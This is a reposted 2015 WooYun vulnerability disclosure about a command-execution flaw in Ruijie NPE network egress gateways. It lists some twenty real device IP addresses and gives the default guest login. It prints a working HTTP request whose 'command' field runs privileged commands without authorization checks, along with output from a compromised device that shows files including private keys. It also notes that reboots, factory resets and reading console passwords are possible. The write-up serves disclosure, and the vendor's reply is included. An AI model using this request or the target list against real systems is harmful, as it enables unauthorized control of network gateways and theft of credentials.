发新话题
打印

锐捷NPE出口网关任意操作的命令执行

锐捷NPE出口网关任意操作的命令执行

漏洞概要
缺陷编号:        WooYun-2015-123851
漏洞标题:        锐捷NPE出口网关任意操作的命令执行
相关厂商:        ruijie.com.cn
漏洞作者:        路人甲
提交时间:        2015-07-01 10:39
公开时间:        2015-09-29 17:52
漏洞类型:        非授权访问
危害等级:        高
自评Rank:        15
漏洞状态: 厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:设计缺陷/边界绕过


漏洞详情披露状态:
2015-07-01:        细节已通知厂商并且等待厂商处理中
2015-07-01:        厂商已经确认,细节仅向厂商公开
2015-07-04:        细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-08-25:        细节向核心白帽子及相关领域专家公开
2015-09-04:        细节向普通白帽子公开
2015-09-14:        细节向实习白帽子公开
2015-09-29:        细节向公众公开

简要描述:锐捷NPE出口网关任意操作的命令执行
详细说明:厂商:锐捷网络

产品名称:NPE网络出口引擎

官网:http://www.ruijie.com.cn/

关键字:title:锐捷网络 --NPE网络出口引擎--登录界面





列举了部分:

http://223.220.248.3/index.htm

http://221.213.54.66/index.htm

http://219.139.148.126/index.htm

http://60.19.64.146/index.htm

http://125.67.7.2/index.htm

http://202.103.10.214/index.htm

http://58.18.131.200/index.htm

http://175.174.62.25/index.htm

http://58.254.92.130/index.htm

http://58.18.163.190/index.htm

http://117.132.9.226/index.htm

http://119.255.22.13/index.htm

http://211.154.11.246/index.htm

http://221.203.77.234/index.htm

http://120.209.15.197:8888/index.htm

http://61.131.82.228:8080/index.htm

http://221.202.167.17:8080/index.htm

http://202.115.254.26/index.htm

http://1.30.21.42/index.htm

http://218.65.220.99:9090/index.htm



系统自身存在的用户有:admin、manager、guest。guest的默认账号是guest,

一个正常的guest用户登陆后的cookie是这样的:

Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1



之前出现越权登陆之后,锐捷将guest的账户页面仅可查看当前状态,前台是无法进行任何操作的。但是问题是,前台的可视化显示是通过直接调用命令进行展示,调用命令的时候,是没有进行任何的权限认证的,从而导致了任意代码执行。



这里以http://221.213.54.66/index.htm为例:





前台会调用各种系统命令,如端口状态、CPU状态等等

这里以其中的一条后台请求为例:




code 区域POST /WEB_VMS/LEVEL15/ HTTP/1.1
Accept: */*
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Referer: http://221.213.54.66/cache.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: 221.213.54.66
Content-Length: 73
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1

command=show%20clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.



其中command可控,直接执行各种敏感命令均可!

如查看版本信息:





配置信息:





控制台用户密码:





当然也可以重启、恢复出厂默认、更改各项配置等等。

不仅如此,还可以获取系统任意信息及文件。

如:获取系统文件:


code 区域Mode Link      Size               MTime Name<OPTION>
-------- ---- --------- ------------------- ------------------<OPTION>
   <DIR>    1         0 1970-01-01 08:00:00 dev/<OPTION>
   <DIR>    2         0 2011-07-20 22:53:09 mnt/<OPTION>
   <DIR>    1         0 2015-06-09 08:46:13 ram/<OPTION>
   <DIR>    2         0 2015-01-07 00:11:07 tmp/<OPTION>
   <DIR>    0         0 1970-01-01 08:00:00 proc/<OPTION>
            1    239730 1970-01-01 08:02:49 ucs_gb.db <OPTION>
            1    915556 2012-07-26 08:31:33 signature.db <OPTION>
            1        34 2015-06-12 08:34:30 update_list.txt <OPTION>
            1       410 2012-07-26 08:32:49 file_list.txt <OPTION>
            1  13652864 2014-09-02 17:47:14 rgos4b8R144358.bin <OPTION>
            1   2255101 1970-01-01 08:02:52 lb-route-choose.db <OPTION>
            1       424 2011-10-11 22:52:59 rsa_private.bin <OPTION>
   <DIR>    4         0 2012-12-11 08:17:47 pkistore/<OPTION>
            1       696 2015-01-06 22:56:47 httpd_cert.crt <OPTION>
            1     25769 1970-01-01 08:02:52 fc_template.txt <OPTION>
            1   2200856 2015-06-04 08:35:08 app_sub_1.db <OPTION>
            1    124840 2015-06-04 08:35:14 app_sub_2.db <OPTION>
            1       688 2015-06-04 08:35:14 app_sub_3.db <OPTION>
            1     30023 2014-09-02 16:46:04 config20140902.text <OPTION>
            1      8891 2015-01-08 09:15:29 signature_content.db <OPTION>
            1       887 2015-01-06 22:56:47 httpd_key.pem <OPTION>
            1  14667776 1970-01-01 08:02:24 rgos.bin <OPTION>
            1        82 2014-05-05 17:20:57 tcp_close_trace.text <OPTION>
            1    150740 1970-01-01 08:02:48 ucs_big5.db <OPTION>
            1      4936 2015-05-04 16:04:57 config.text <OPTION>
            1      5273 2015-01-08 09:15:29 feedback.txt <OPTION>
            1     56882 2015-04-18 08:34:40 route-choose.db <OPTION>
   <DIR>    5         0 2008-08-09 11:23:24 portal/<OPTION>
            1       424 2011-10-11 22:52:59 rsa1_private.bin <OPTION>
   <DIR>    2         0 2015-06-12 08:50:24 feedback/<OPTION>
   <DIR>    2         0 2015-06-04 08:35:05 app_tmp/<OPTION>
            1  14667776 1970-01-01 08:01:59 rgos.bin.bak <OPTION>
            1   8978272 2015-01-10 08:39:54 web_management_pack.upd <OPTION>
            1       390 2015-06-04 08:35:04 app_file_list.txt <OPTION>
   <DIR>    2         0 2012-12-11 11:29:56 user_auth/<OPTION>
            1     42496 1970-01-01 08:00:32 portal_pack.upd <OPTION>
            1      3275 2011-10-01 23:47:17 config.text.ord <OPTION>
   <DIR>    2         0 2015-06-10 08:34:23 http_update/<OPTION>
--------------------------------------------------------------<OPTION>
27 Files (Total size 58035091 Bytes), 11 Directories.<OPTION>
Total 535822336 bytes (511MB) in this device, 448499712 bytes (427MB) available.<OPTION>

漏洞证明:如上!

修复方案:如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应
厂商回应:
危害等级:低

漏洞Rank:1
确认时间:2015-07-01 17:50
厂商回复:修复方案:
设备软件版本升级到最新版即可

最新状态:2015-07-02:已经在官网,提供解决漏洞的新版本供下载。 并且每次发布新版本后,设备上的web都会有一次提示更新,请根据提示升级。
原文:http://www.wooyun.org/bugs/wooyun-2015-0123851

TOP

发新话题